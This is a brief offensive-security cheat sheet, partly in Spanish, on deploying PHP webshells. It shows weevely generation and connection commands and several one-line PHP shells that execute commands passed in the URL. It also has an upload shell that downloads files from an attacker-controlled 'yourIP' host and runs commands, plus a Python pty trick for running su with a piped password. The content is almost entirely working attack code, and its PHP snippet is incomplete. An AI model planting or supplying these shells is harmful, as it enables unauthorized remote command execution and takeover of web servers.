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1 full webshells


genera webshells

weevely generate password /tmp/payload.php

despues lo llamamos con :

weevely password



2 lite webshells

PHP web shells

<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>

php with upload

 if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload'], file_get_contents("http://yourIP/" . $_REQUEST['fupload']));
 if (isset($_REQUEST['cmd'])) {
  echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";

then the above can be accessed by

curl  http://IP/shell.php?fupload=filename_on_your_webserver

if running whoami we get the error: ‘standard in must be a tty’ we can try:

(sleep 1; echo password) | python -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"